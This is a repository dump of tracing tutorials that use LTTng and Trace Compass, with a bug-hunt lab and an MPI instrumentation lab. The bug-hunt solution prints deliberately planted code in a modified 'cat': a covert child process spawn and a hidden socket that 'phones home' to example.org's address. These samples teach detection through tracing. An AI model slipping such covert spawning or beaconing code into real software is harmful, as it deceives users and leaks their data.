https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/201-lttng-userspace-tracing/screenshots/statedumpBinInfo.png -------------------------------------------------------------------------------- /labs/201-lttng-userspace-tracing/screenshots/ustKernelConfigureSymbols.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/201-lttng-userspace-tracing/screenshots/ustKernelConfigureSymbols.png -------------------------------------------------------------------------------- /labs/201-lttng-userspace-tracing/screenshots/ustKernelCriticalPath.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/201-lttng-userspace-tracing/screenshots/ustKernelCriticalPath.png -------------------------------------------------------------------------------- /labs/201-lttng-userspace-tracing/screenshots/ustKernelFlameChart.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/201-lttng-userspace-tracing/screenshots/ustKernelFlameChart.png -------------------------------------------------------------------------------- /labs/201-lttng-userspace-tracing/screenshots/ustKernelFlameGraph.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/201-lttng-userspace-tracing/screenshots/ustKernelFlameGraph.png -------------------------------------------------------------------------------- /labs/201-lttng-userspace-tracing/screenshots/ustKernelFollowThread.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/201-lttng-userspace-tracing/screenshots/ustKernelFollowThread.png -------------------------------------------------------------------------------- /labs/201-lttng-userspace-tracing/screenshots/ustMemoryPotentialLeaks.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/201-lttng-userspace-tracing/screenshots/ustMemoryPotentialLeaks.png -------------------------------------------------------------------------------- /labs/201-lttng-userspace-tracing/screenshots/ustMemoryUsage.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/201-lttng-userspace-tracing/screenshots/ustMemoryUsage.png -------------------------------------------------------------------------------- /labs/202-bug-hunt/BugHuntResults.md: -------------------------------------------------------------------------------- 1 | ### Solutions to the Bug Hunt 2 | 3 | The `cat` file had 4 more or less obvious problems/issues. This is a teaching use case, meant to show some potential issues in a very very simple program. "Real" issues will be a lot harder to find in a much more complex code base. But the tools are the same. 4 | 5 | - - - 6 | 7 | #### Bug #1: memory leak 8 | 9 | As mentioned in a previous lab, TraceCompass does not claim to be a memory leak finder. `Valgrind` would do a better job in this case and pinpoint the exact line of the leaked memory allocation. But we can observe it in TraceCompass and see where/when in the execution the leak may have happened. 10 | 11 | ![Bug Hunt Memory Leak](screenshots/memoryLeak.png "Bug Hunt: Memory Leak") 12 | 13 | This happens in the `cat.c` file at line 769 14 | 15 | ```c 16 | 769 test = malloc(1000); 17 | 770 printf("That's a custom-compiled cat for tutorial purposes %s", test); 18 | 771 inbuf = xmalloc (insize + 1 + page_size - 1); 19 | 772 test = inbuf; // Losing my pointer 20 | ``` 21 | 22 | - - - 23 | 24 | #### Bug #2: An "optimization loop" of usleep 25 | 26 | When developing, it's often convenient to add some latency at some places to avoid a race condition or make sure some other condition is met. The techniques used are sometimes... dubious... One of them is adding sleeps in the code. We can see those with TraceCompass. The critical path shows a `Timer` state for those and the thread is blocked. 27 | 28 | ![Bug Hunt Optimization Loop](screenshots/optimizationLoop.png "Bug Hunt: Optimization Loop") 29 | 30 | This happens in the `cat.c` file in the `next_line_num` function at line 175: 31 | 32 | ```c 33 | 132 static void 34 | 133 next_line_num (void) 35 | 134 { 36 | .... 37 | 174 // Optimization loop, remove when we need more perf ;-) 38 | 175 usleep(100); 39 | 176 } 40 | ``` 41 | 42 | - - - 43 | 44 | #### Bug #3: Spawning a process! 45 | 46 | Most complex applications today are multi-threaded so we expect to see a lot of children to a given process. But could one of those children be a malicious one? TraceCompass shows all the hierarchy of processes and threads, so in doubt, it is possible to examine one in particular and see what it does. 47 | 48 | In our case, `cat` is not expected to have any children, but it has, and more than one. 49 | 50 | * Some are named `cat-ust`. Looking at their critical path, we see it interacts with `lttng-consumerd`. Since we are explicitly tracing `cat` with `lttng-ust`, this behaviour would be normal in this case. Everythin happens before the call to main, so it's the libraries preloading. 51 | 52 | * We also observe a `sleep` process being spawned during execution, in the middle of a `next_line_num` function. That is not normal. `sleep` is harmless here, but a malicious application could start a key logger process for instance. 53 | 54 | ![Bug Hunt Spawn Process](screenshots/spawnProcess.png "Bug Hunt: Spawn Process") 55 | 56 | This happens in the `cat.c` file in the `next_line_num` function from line 136 to 158: 57 | 58 | ```c 59 | 136 if ((endp - line_num_start) == 2 && execDone == 0) { 60 | 137 // This file looks long enough, let's subrepticiously start a thread hehehe 61 | 138 pid_t process = fork(); 62 | 139 63 | 140 if (process < 0){ 64 | 141 //fork error, oops, just be quiet... 65 | 142 } 66 | 143 if (process == 0){ 67 | 144 char cmd_exec[11] = "/bin/sleep"; 68 | 145 char time_sec[2] = "5"; 69 | 146 char* argv[2]; 70 | 147 71 | 148 argv[0] = cmd_exec; 72 | 149 argv[1] = time_sec; 73 | 150 74 | 151 execv("/bin/sleep", (char *[]){ cmd_exec, time_sec, NULL }); 75 | 152 fprintf(stderr, "\n********************\n"); 76 | 153 fprintf(stderr, " Unable to exec %s: %d\n", argv[0], errno); 77 | 154 fprintf(stderr, "********************\n"); 78 | 155 exit(1); 79 | 156 } 80 | 157 execDone = 1; 81 | 158 } 82 | ``` 83 | 84 | - - - 85 | 86 | #### Bug #4: Subrepticious Phone Home 87 | 88 | Computer systems, from smart phones to data centers, store a lot of very sensitive/personal data, that can be of interest to many attackers. It may be tempting for some attackers to add some code snippets to leak this precious data. With TraceCompass and the critical path, we can observe network connections and messaging. Of course, the implementation here is naive. If I were to write such a code, I'd make sure it is not obvious like this one, but... not all attackers are smart or know about this? 89 | 90 | Here, we do not expect `cat` to do any network connection, unless we are catting a file from the network, which we aren't. So those network connections are fishy. 91 | 92 | ![Bug Hunt Phone Home](screenshots/phoneHome.png "Bug Hunt: Phone Home") 93 | 94 | This happens in the `cat.c` file in the `cat` function from line 513 to 533: 95 | 96 | ```c 97 | 513 if (bpin + 5 < eob && *bpin == ' ' && *(bpin + 1) == 'c' && *(bpin + 2) == 'a' && *(bpin + 3) == 't' && *(bpin + 4) == ' ') { 98 | 514 // omg, he said ' cat ', we need to tell the boss 99 | 515 int sockfd = 0,n = 0; 100 | 516 char sendBuff[1024] = "Hey boss, this user said cat, that's not right"; 101 | 517 struct sockaddr_in serv_addr; 102 | 518 103 | 519 if((sockfd = socket(AF_INET, SOCK_STREAM, 0))> 0) 104 | 520 { 105 | 521 serv_addr.sin_family = AF_INET; 106 | 522 serv_addr.sin_port = htons(80); 107 | 523 serv_addr.sin_addr.s_addr = inet_addr("93.184.216.34"); // www.example.org 108 | 524 109 | 525 if(connect(sockfd, (struct sockaddr *)&serv_addr, sizeof(serv_addr))>=0) 110 | 526 { 111 | 527 n = write(sockfd, sendBuff, sizeof(sendBuff)-1); 112 | 528 if (n < 0) { 113 | 529 // Couldn't tell boss, that's too bad 114 | 530 } 115 | 531 } 116 | 532 } 117 | 533 } 118 | ``` 119 | 120 | - - - 121 | 122 | #### Next 123 | 124 | * [Back](../) for more options 125 | -------------------------------------------------------------------------------- /labs/202-bug-hunt/README.md: -------------------------------------------------------------------------------- 1 | ## Bug Hunt 2 | 3 | In this lab, you'll be invited to find issues that have been purposefully introduced in an otherwise quite simple and straightforward program: `cat`. 4 | 5 | *Pre-requisites*: This lab supposes that you are now familiar with kernel and some userspace trace visualization. You should have done the [kernel trace navigation](../101-analyze-system-trace-in-tracecompass), [kernel critical path](../102-tracing-wget-critical-path) and [userspace tracing](../201-lttng-userspace-tracing) labs. 6 | 7 | - - - 8 | 9 | ### Task 1: Set Up and Run the Experiment 10 | 11 | The `files/` directory of this lab contains a file named `cat.c`, which has been modified from coreutils to introduce some issues visible with tracing. **Do not look at the file!**. It is small enough that the issues will be obvious. 12 | 13 | First, we'll need to install coreutils to add our cat.c file to it. If you did the [userspace tracing](../201-lttng-userspace-tracing) lab and compiled coreutils, skip this step: 14 | 15 | ```bash 16 | $ git clone git://git.sv.gnu.org/coreutils 17 | $ cd coreutils 18 | $ ./bootstrap 19 | $ ./configure CFLAGS="-g -O2 -finstrument-functions" 20 | ``` 21 | 22 | Now copy the `cat.c` file to coreutils 23 | 24 | ``` 25 | $ cp files/cat.c coreutils/src/ 26 | ``` 27 | 28 | And type the `make` command in coreutils. 29 | 30 | ``` 31 | $ make 32 | ``` 33 | 34 | Now, let's trace this new modified `cat` version. We will trace using both kernel and userspace data, to get the full picture. 35 | 36 | ``` 37 | $ lttng-record-trace -p cyg_profile,libc,kernel,memory ./src/cat -n src/cat.c 38 | ``` 39 | 40 | The resulting trace will be in a `cat-k-u-(*)` directory. 41 | 42 | - - - 43 | 44 | ### Task 2: Import in TraceCompass 45 | 46 | To import traces in TraceCompass, you can right-click or your project's `Traces` folder, or click on the *File* menu, and select *Import...*. This will open the import wizard. You must select the directory where the traces are located, so the `cat-k-u-(*)` directory. 47 | 48 | Click on the folder's name on the left side to select all traces under that folder. In the options below, make sure the *Create experiment* is checked, with an experiment in the textbox beside the option, as shown in the screenshot below. 49 | 50 | ![ImportExperiment](screenshots/importExperiment.png "Trace Compass Import Experiment") 51 | 52 | The traces will be imported. Then expand the *Experiments* folder to see the experiment that was just created with the traces in it. Double-click on the experiment to open it. 53 | 54 | ![OpenExperiment](screenshots/openExperiment.png "Trace Compass Open Experiment") 55 | 56 | - - - 57 | 58 | ### Task 3: Analyze the trace 59 | 60 | You should now be able to use the notions learned in the previous labs to find the issues with the `cat` process. You can use all the kernel or userspace views available. 61 | 62 | There are 4 separate issues in this example. 63 | 64 | When you think you have found them all, you can look [at the solution](BugHuntResults.md). 65 | -------------------------------------------------------------------------------- /labs/202-bug-hunt/files/cat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/202-bug-hunt/files/cat -------------------------------------------------------------------------------- /labs/202-bug-hunt/screenshots/importExperiment.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/202-bug-hunt/screenshots/importExperiment.png -------------------------------------------------------------------------------- /labs/202-bug-hunt/screenshots/memoryLeak.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/202-bug-hunt/screenshots/memoryLeak.png -------------------------------------------------------------------------------- /labs/202-bug-hunt/screenshots/openExperiment.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/202-bug-hunt/screenshots/openExperiment.png -------------------------------------------------------------------------------- /labs/202-bug-hunt/screenshots/optimizationLoop.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/202-bug-hunt/screenshots/optimizationLoop.png -------------------------------------------------------------------------------- /labs/202-bug-hunt/screenshots/phoneHome.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/202-bug-hunt/screenshots/phoneHome.png -------------------------------------------------------------------------------- /labs/202-bug-hunt/screenshots/spawnProcess.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/202-bug-hunt/screenshots/spawnProcess.png -------------------------------------------------------------------------------- /labs/203-custom-userspace-instrumentation-in-c/README.md: -------------------------------------------------------------------------------- 1 | ## Custom Userspace Instrumentation of C/C++ Applications 2 | 3 | In this lab, you will learn how to instrument, compile and trace your own application using LTTng userspace instrumentation. We'll instrument a simple C MPI application doing message passing between threads. 4 | 5 | *Pre-requisites*: Have Trace Compass installed and opened. Have lttng-ust installed, most notably the `liblttng-ust-dev` package. You can follow the [Install LTTng on Ubuntu](../001-instal-lttng-on-ubuntu/) lab or read the [LTTng web site](http://lttng.org) for more information. 6 | 7 | *Note*: If you do not want to instrument the application and go straight to the analysis part for custom traces, you can directly go to the [scripted analysis for custom instrumentation](../204-scripted-analysis-for-custom-instrumentation) lab and use the trace provided with this tutorial. 8 | 9 | - - - 10 | 11 | ### Task 1: Understand The MPI Application To Trace 12 | 13 | For this lab, we'll instrument an MPI application, taken from the [MPI tutorial](https://mpitutorial.com/) examples. We'll instrument the `ring` application, in which one mpi worker sends a value to the next and so on until the value comes back to the first worker. The subset of files used for this lab, original and instrumented, are in the [code](code/) directory of this lab. To compile and run it, you'll need the `openmpi` development package (in Ubuntu, `sudo apt-get install mpi-default-dev`). A trace of the application is also available in the trace archive that comes with this tutorial. 14 | 15 | ```bash 16 | $ git clone https://github.com/wesleykendall/mpitutorial.git 17 | $ cd mpitutorial/tutorials/mpi-send-and-receive/code 18 | ``` 19 | 20 | The file to instrument will be the *ring.c* file. For more information on instrumenting applications, you can read the [complete documentation for instrumenting C/C++ applications with LTTng](https://lttng.org/docs/v2.10/#doc-c-application). 21 | 22 | If we look at the [original ring.c](code/ring.orig.c) file, we can identify locations to instrument. We should instrument the following locations: 23 | 24 | * After initialization: that's were we get the ID of the current MPI thread, so we will add the world_rank as a field. 25 | * Before and after reception: We can identify the time spent waiting for a message. After the reception, we'll add the source of the message as a field. 26 | * Before and after sending: To identify when we send the message to another worker. Before the send, we'll add the destination of the message as a field. 27 | 28 | ![OriginalCode](screenshots/originalCode.png "Original code") 29 | 30 | - - - 31 | 32 | ### Task 2: Define The Tracepoint Provider Files 33 | 34 | The first step to instrument is to add the *tracepoint provider header file* that we will name `ring_tp.h`. This file contains the tracepoint definitions for all the tracepoints we'll insert. That's where we define their names, the fields to add and their types, etc. 35 | 36 | ```C 37 | #undef TRACEPOINT_PROVIDER 38 | #define TRACEPOINT_PROVIDER ring 39 | 40 | #undef TRACEPOINT_INCLUDE 41 | #define TRACEPOINT_INCLUDE "./ring_tp.h" 42 | 43 | #if !defined(_RING_TP_H) || defined(TRACEPOINT_HEADER_MULTI_READ) 44 | #define _TP_H 45 | 46 | #include 47 | 48 | /* An event */ 49 | TRACEPOINT_EVENT( 50 | /* Tracepoint provider name */ 51 | ring, 52 | /* Tracepoint class name */ 53 | init, 54 | /* Input arguments */ 55 | TP_ARGS( 56 | int, worker_id 57 | ), 58 | /* Output event fields */ 59 | TP_FIELDS( 60 | ctf_integer(int, worker_id, worker_id) 61 | ) 62 | ) 63 | 64 | TRACEPOINT_EVENT( 65 | ring, 66 | recv_exit, 67 | TP_ARGS( 68 | int, worker_id 69 | ), 70 | TP_FIELDS( 71 | ctf_integer(int, source, worker_id) 72 | ) 73 | ) 74 | 75 | TRACEPOINT_EVENT( 76 | ring, 77 | send_entry, 78 | TP_ARGS( 79 | int, worker_id 80 | ), 81 | TP_FIELDS( 82 | ctf_integer(int, dest, worker_id) 83 | ) 84 | ) 85 | 86 | /* The tracepoint class */ 87 | TRACEPOINT_EVENT_CLASS( 88 | /* Tracepoint provider name */ 89 | ring, 90 | /* Tracepoint class name */ 91 | no_field, 92 | /* Input arguments */ 93 | TP_ARGS( 94 | 95 | ), 96 | /* Output event fields */ 97 | TP_FIELDS( 98 | 99 | ) 100 | ) 101 | 102 | /* Trace point instance of the no_field class */ 103 | TRACEPOINT_EVENT_INSTANCE( 104 | ring, 105 | no_field, 106 | recv_entry, 107 | TP_ARGS( 108 | 109 | ) 110 | ) 111 | 112 | TRACEPOINT_EVENT_INSTANCE( 113 | ring, 114 | no_field, 115 | send_exit, 116 | TP_ARGS( 117 | 118 | ) 119 | ) 120 | 121 | #endif /* _RING_TP_H */ 122 | 123 | #include 124 | ``` 125 | 126 | Then we need to create the *tracepoint provider package source file*, which is a C source file that includes the *tracepoint provider header file* described above and is used to expand the tracepoint definition macros. That file will be named `ring_tp.c` and contains the simple following code: 127 | 128 | ```C 129 | #define TRACEPOINT_CREATE_PROBES 130 | 131 | #include "ring_tp.h" 132 | ``` 133 | 134 | Now we are ready to instrument the application itself. 135 | 136 | - - - 137 | 138 | ### Task 3: Instrument The Application 139 | 140 | To instrument the application, you should use the `tracepoint()` macro in the source code, with parameters that match the tracepoint definition. So to match the recv_exit tracepoint described above, the `tracepoint(ring, recv_exit, sourceId)` should be entered. 141 | 142 | But you first need to include the tracepoint definition file and make sure the macros are expanded. The following lines should be added at the beginning of the file. 143 | 144 | ```C 145 | #define TRACEPOINT_DEFINE 146 | #include "ring_tp.h" 147 | ``` 148 | 149 | The code block below shows the diff between the original MPI ring application, and the instrumented one, with tracepoints inserted at the locations determined before. The [complete instrumented source file](code/ring.c) is available in the [code directory](code/). 150 | 151 | ```diff 152 | @@ -10,12 +10,16 @@ 153 | #include 154 | #include 155 | 156 | +#define TRACEPOINT_DEFINE 157 | +#include "ring_tp.h" 158 | + 159 | int main(int argc, char** argv) { 160 | // Initialize the MPI environment 161 | MPI_Init(NULL, NULL); 162 | // Find out rank, size 163 | int world_rank; 164 | MPI_Comm_rank(MPI_COMM_WORLD, &world_rank); 165 | + tracepoint(ring, init, world_rank); 166 | int world_size; 167 | MPI_Comm_size(MPI_COMM_WORLD, &world_size); 168 | 169 | @@ -23,22 +27,28 @@ int main(int argc, char** argv) { 170 | // Receive from the lower process and send to the higher process. Take care 171 | // of the special case when you are the first process to prevent deadlock. 172 | if (world_rank != 0) { 173 | + tracepoint(ring, recv_entry); 174 | MPI_Recv(&token, 1, MPI_INT, world_rank - 1, 0, MPI_COMM_WORLD, 175 | MPI_STATUS_IGNORE); 176 | + tracepoint(ring, recv_exit, world_rank - 1); 177 | printf("Process %d received token %d from process %d\n", world_rank, token, 178 | world_rank - 1); 179 | } else { 180 | // Set the token's value if you are process 0 181 | token = -1; 182 | } 183 | + tracepoint(ring, send_entry, (world_rank + 1) % world_size); 184 | MPI_Send(&token, 1, MPI_INT, (world_rank + 1) % world_size, 0, 185 | MPI_COMM_WORLD); 186 | + tracepoint(ring, send_exit); 187 | // Now process 0 can receive from the last process. This makes sure that at 188 | // least one MPI_Send is initialized before all MPI_Recvs (again, to prevent 189 | // deadlock) 190 | if (world_rank == 0) { 191 | + tracepoint(ring, recv_entry); 192 | MPI_Recv(&token, 1, MPI_INT, world_size - 1, 0, MPI_COMM_WORLD, 193 | MPI_STATUS_IGNORE); 194 | + tracepoint(ring, recv_exit, world_size - 1); 195 | printf("Process %d received token %d from process %d\n", world_rank, token, 196 | world_size - 1); 197 | } 198 | ``` 199 | 200 | - - - 201 | 202 | ### Task 4: Compile The Application 203 | 204 | The next step is to build the application with the tracepoints, using the `lttng-ust` libraries. There are many ways to compile and link an application with tracepoints: tracepoints can be statically linked with the instrumented application, or tracepoints can be compiled in a shared object, then linked with the application, or preloaded at compile time, etc. The LTTng documentation describes an [exhaustive list of compile and link scenarios](https://lttng.org/docs/v2.10/#doc-building-tracepoint-providers-and-user-application) for instrumented application. 205 | 206 | For this lab, we'll present the simplest one: statically linking the tracepoints with the application. 207 | 208 | We should compile the `ring.c` file along with the tracepoint provider package source file and linking with the lttng-ust library flag. 209 | 210 | ```bash 211 | $ mpicc -o ring -I. ring_tp.c ring.c -llttng-ust -ldl 212 | ``` 213 | 214 | The `ring` application is now instrumented with static LTTng tracepoints. The application can be run as usual and the tracepoints, when not traced, should have a near zero overhead. 215 | 216 | ```bash 217 | $ mpirun -N 4 ./ring 218 | Process 1 received token -1 from process 0 219 | Process 2 received token -1 from process 1 220 | Process 3 received token -1 from process 2 221 | Process 0 received token -1 from process 3 222 | ``` 223 | 224 | The following block shows the difference between the [original simple `makefile`](code/makefile.orig) and the [`makefile` for static linkage](code/makefile) of tracepoint code. 225 | 226 | ```diff 227 | @@ -4,7 +4,7 @@ MPICC?=mpicc 228 | all: ${EXECS} 229 | 230 | ring: ring.c 231 | - ${MPICC} -o ring ring.c 232 | + ${MPICC} -o ring -I. ring_tp.c ring.c -llttng-ust -ldl 233 | 234 | clean: 235 | rm -f ${EXECS} 236 | ``` 237 | 238 | - - - 239 | 240 | ### Task 5: Trace an Instrumented Application 241 | 242 | To trace an application instrumented with LTTng-UST tracepoints, one simply needs to create a tracing session, enable the userspace events corresponding to the **ring** tracepoint provider, start tracing and run the application. 243 | 244 | Since we are tracing userspace only, we add the `vtid` context, to differentiate the running thread. This context wouldn't be necessary if there was a kernel trace taken at the same time. 245 | 246 | ```bash 247 | $ lttng create 248 | Session auto-20191015-113432 created. 249 | Traces will be output to /home/user/lttng-traces/auto-20191015-113432 250 | $ lttng enable-event -u 'ring:*' 251 | UST event ring:* created in channel channel0 252 | $ lttng add-context -u -t vtid 253 | UST context vtid added to all channels 254 | $ lttng start 255 | Tracing started for session auto-20191015-113432 256 | $ mpirun -N 4 ./ring 257 | Process 1 received token -1 from process 0 258 | Process 2 received token -1 from process 1 259 | Process 3 received token -1 from process 2 260 | Process 0 received token -1 from process 3 261 | $ lttng stop 262 | Waiting for destruction of session "auto-20191015-113432"... 263 | Tracing stopped for session "auto-20191015-113432" 264 | $ lttng view 265 | Trace directory: /home/user/lttng-traces/auto-20191015-113432 266 | 267 | [... trace output] 268 | $ lttng destroy 269 | Session "auto-20191015-113432" destroyed 270 | ``` 271 | 272 | The trace is available in the `/home/user/lttng-traces/auto-20191015-113432`, typically in a `ust/uid//64-bit` sub-directory. It can now be opened in visualization tools like Trace Compass. 273 | 274 | - - - 275 | 276 | ### Conclusion 277 | 278 | In the lab, you have instrumented and compiled a simple MPI application, with LTTng userspace instrumentation. You also obtained a trace from this application execution. But the events in the trace are of type that is not understood by default by the trace viewers. They can be counted, one can manually follow the execution of the application, but hardly any analysis can be made out of the box. In the next lab, we'll see how we can visualize those custom traces. 279 | 280 | - - - 281 | 282 | #### Next 283 | 284 | * [Script Analyzes For Custom Instrumentation](../204-scripted-analysis-for-custom-instrumentation) to see how we can analyze and observe traces with custom instrumentation 285 | or 286 | * [Back](../) for more options 287 | -------------------------------------------------------------------------------- /labs/203-custom-userspace-instrumentation-in-c/code/makefile: -------------------------------------------------------------------------------- 1 | EXECS=ring 2 | MPICC?=mpicc 3 | 4 | all: ${EXECS} 5 | 6 | ring: ring.c 7 | ${MPICC} -o ring -I. ring_tp.c ring.c -llttng-ust -ldl 8 | 9 | clean: 10 | rm -f ${EXECS} 11 | -------------------------------------------------------------------------------- /labs/203-custom-userspace-instrumentation-in-c/code/makefile.orig: -------------------------------------------------------------------------------- 1 | EXECS=ring 2 | MPICC?=mpicc 3 | 4 | all: ${EXECS} 5 | 6 | ring: ring.c 7 | ${MPICC} -o ring ring.c 8 | 9 | clean: 10 | rm -f ${EXECS} 11 | -------------------------------------------------------------------------------- /labs/203-custom-userspace-instrumentation-in-c/code/ring.c: -------------------------------------------------------------------------------- 1 | // Author: Wes Kendall 2 | // Copyright 2011 www.mpitutorial.com 3 | // This code is provided freely with the tutorials on mpitutorial.com. Feel 4 | // free to modify it for your own use. Any distribution of the code must 5 | // either provide a link to www.mpitutorial.com or keep this header intact. 6 | // 7 | // Example using MPI_Send and MPI_Recv to pass a message around in a ring. 8 | // 9 | #include 10 | #include 11 | #include 12 | 13 | #define TRACEPOINT_DEFINE 14 | #include "ring_tp.h" 15 | 16 | int main(int argc, char** argv) { 17 | // Initialize the MPI environment 18 | MPI_Init(NULL, NULL); 19 | // Find out rank, size 20 | int world_rank; 21 | MPI_Comm_rank(MPI_COMM_WORLD, &world_rank); 22 | tracepoint(ring, init, world_rank); 23 | int world_size; 24 | MPI_Comm_size(MPI_COMM_WORLD, &world_size); 25 | 26 | int token; 27 | // Receive from the lower process and send to the higher process. Take care 28 | // of the special case when you are the first process to prevent deadlock. 29 | if (world_rank != 0) { 30 | tracepoint(ring, recv_entry); 31 | MPI_Recv(&token, 1, MPI_INT, world_rank - 1, 0, MPI_COMM_WORLD, 32 | MPI_STATUS_IGNORE); 33 | tracepoint(ring, recv_exit, world_rank - 1); 34 | printf("Process %d received token %d from process %d\n", world_rank, token, 35 | world_rank - 1); 36 | } else { 37 | // Set the token's value if you are process 0 38 | token = -1; 39 | } 40 | tracepoint(ring, send_entry, (world_rank + 1) % world_size); 41 | MPI_Send(&token, 1, MPI_INT, (world_rank + 1) % world_size, 0, 42 | MPI_COMM_WORLD); 43 | tracepoint(ring, send_exit); 44 | // Now process 0 can receive from the last process. This makes sure that at 45 | // least one MPI_Send is initialized before all MPI_Recvs (again, to prevent 46 | // deadlock) 47 | if (world_rank == 0) { 48 | tracepoint(ring, recv_entry); 49 | MPI_Recv(&token, 1, MPI_INT, world_size - 1, 0, MPI_COMM_WORLD, 50 | MPI_STATUS_IGNORE); 51 | tracepoint(ring, recv_exit, world_size - 1); 52 | printf("Process %d received token %d from process %d\n", world_rank, token, 53 | world_size - 1); 54 | } 55 | MPI_Finalize(); 56 | } 57 | -------------------------------------------------------------------------------- /labs/203-custom-userspace-instrumentation-in-c/code/ring.orig.c: -------------------------------------------------------------------------------- 1 | // Author: Wes Kendall 2 | // Copyright 2011 www.mpitutorial.com 3 | // This code is provided freely with the tutorials on mpitutorial.com. Feel 4 | // free to modify it for your own use. Any distribution of the code must 5 | // either provide a link to www.mpitutorial.com or keep this header intact. 6 | // 7 | // Example using MPI_Send and MPI_Recv to pass a message around in a ring. 8 | // 9 | #include 10 | #include 11 | #include 12 | 13 | int main(int argc, char** argv) { 14 | // Initialize the MPI environment 15 | MPI_Init(NULL, NULL); 16 | // Find out rank, size 17 | int world_rank; 18 | MPI_Comm_rank(MPI_COMM_WORLD, &world_rank); 19 | int world_size; 20 | MPI_Comm_size(MPI_COMM_WORLD, &world_size); 21 | 22 | int token; 23 | // Receive from the lower process and send to the higher process. Take care 24 | // of the special case when you are the first process to prevent deadlock. 25 | if (world_rank != 0) { 26 | MPI_Recv(&token, 1, MPI_INT, world_rank - 1, 0, MPI_COMM_WORLD, 27 | MPI_STATUS_IGNORE); 28 | printf("Process %d received token %d from process %d\n", world_rank, token, 29 | world_rank - 1); 30 | } else { 31 | // Set the token's value if you are process 0 32 | token = -1; 33 | } 34 | MPI_Send(&token, 1, MPI_INT, (world_rank + 1) % world_size, 0, 35 | MPI_COMM_WORLD); 36 | // Now process 0 can receive from the last process. This makes sure that at 37 | // least one MPI_Send is initialized before all MPI_Recvs (again, to prevent 38 | // deadlock) 39 | if (world_rank == 0) { 40 | MPI_Recv(&token, 1, MPI_INT, world_size - 1, 0, MPI_COMM_WORLD, 41 | MPI_STATUS_IGNORE); 42 | printf("Process %d received token %d from process %d\n", world_rank, token, 43 | world_size - 1); 44 | } 45 | MPI_Finalize(); 46 | } 47 | -------------------------------------------------------------------------------- /labs/203-custom-userspace-instrumentation-in-c/code/ring_tp.c: -------------------------------------------------------------------------------- 1 | #define TRACEPOINT_CREATE_PROBES 2 | 3 | #include "ring_tp.h" 4 | -------------------------------------------------------------------------------- /labs/203-custom-userspace-instrumentation-in-c/code/ring_tp.h: -------------------------------------------------------------------------------- 1 | #undef TRACEPOINT_PROVIDER 2 | #define TRACEPOINT_PROVIDER ring 3 | 4 | #undef TRACEPOINT_INCLUDE 5 | #define TRACEPOINT_INCLUDE "./ring_tp.h" 6 | 7 | #if !defined(_RING_TP_H) || defined(TRACEPOINT_HEADER_MULTI_READ) 8 | #define _TP_H 9 | 10 | #include 11 | 12 | /* An event */ 13 | TRACEPOINT_EVENT( 14 | /* Tracepoint provider name */ 15 | ring, 16 | /* Tracepoint class name */ 17 | init, 18 | /* Input arguments */ 19 | TP_ARGS( 20 | int, worker_id 21 | ), 22 | /* Output event fields */ 23 | TP_FIELDS( 24 | ctf_integer(int, worker_id, worker_id) 25 | ) 26 | ) 27 | 28 | TRACEPOINT_EVENT( 29 | ring, 30 | recv_exit, 31 | TP_ARGS( 32 | int, worker_id 33 | ), 34 | TP_FIELDS( 35 | ctf_integer(int, source, worker_id) 36 | ) 37 | ) 38 | 39 | TRACEPOINT_EVENT( 40 | ring, 41 | send_entry, 42 | TP_ARGS( 43 | int, worker_id 44 | ), 45 | TP_FIELDS( 46 | ctf_integer(int, dest, worker_id) 47 | ) 48 | ) 49 | 50 | /* The tracepoint class */ 51 | TRACEPOINT_EVENT_CLASS( 52 | /* Tracepoint provider name */ 53 | ring, 54 | /* Tracepoint class name */ 55 | no_field, 56 | /* Input arguments */ 57 | TP_ARGS( 58 | 59 | ), 60 | /* Output event fields */ 61 | TP_FIELDS( 62 | 63 | ) 64 | ) 65 | 66 | /* Trace point instance of the no_field class */ 67 | TRACEPOINT_EVENT_INSTANCE( 68 | ring, 69 | no_field, 70 | recv_entry, 71 | TP_ARGS( 72 | 73 | ) 74 | ) 75 | 76 | TRACEPOINT_EVENT_INSTANCE( 77 | ring, 78 | no_field, 79 | send_exit, 80 | TP_ARGS( 81 | 82 | ) 83 | ) 84 | 85 | #endif /* _RING_TP_H */ 86 | 87 | #include 88 | -------------------------------------------------------------------------------- /labs/203-custom-userspace-instrumentation-in-c/screenshots/originalCode.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/203-custom-userspace-instrumentation-in-c/screenshots/originalCode.png -------------------------------------------------------------------------------- /labs/204-scripted-analysis-for-custom-instrumentation/screenshots/changeJavascriptEngine.png: -------------------------------------------------------------------------------- 